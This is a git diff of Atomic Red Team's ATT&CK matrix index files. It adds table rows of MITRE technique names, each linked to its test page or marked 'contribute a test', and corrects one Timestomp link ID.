+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Data Staging](../../T1074.001/T1074.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | [Service Execution](../../T1569.002/T1569.002.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
+| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | LSA Secrets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Unix Shell](../../T1059.004/T1059.004.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | [Non-Standard Port](../../T1571/T1571.md) | |
+| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Windows Command Shell](../../T1059.003/T1059.003.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Service Discovery](../../T1007/T1007.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Remote Access Software](../../T1219/T1219.md) | |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
+| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
+| | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | |
+| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
+| | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
+| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
+| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
+| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
+| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
+| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
+| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
+| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Rc.common](../../T1037.004/T1037.004.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
+| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Rc.common](../../T1037.004/T1037.004.md) | [Security Support Provider](../../T1547.005/T1547.005.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
+| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
+| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
+| | | SSH Authorized Keys [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
+| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
+| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
+| | | [Screensaver](../../T1546.002/T1546.002.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
+| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
+| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
+| | | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
+| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Trap](../../T1546.005/T1546.005.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
+| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Startup Items](../../T1037.005/T1037.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
+| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Windows Service](../../T1543.003/T1543.003.md) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Trap](../../T1546.005/T1546.005.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
+| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
+| | | [Windows Service](../../T1543.003/T1543.003.md) | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
+| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
+| | | | | [Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
+| | | | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
+| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
+| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rundll32](../../T1218.011/T1218.011.md) | | | | | | | |
| | | | | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
@@ -116,7 +126,7 @@
| | | | | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | | | [Timestomp](../../T1551.006/T1551.006.md) | | | | | | | |
+| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index d8be9c7e..37412bac 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -4,72 +4,76 @@
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
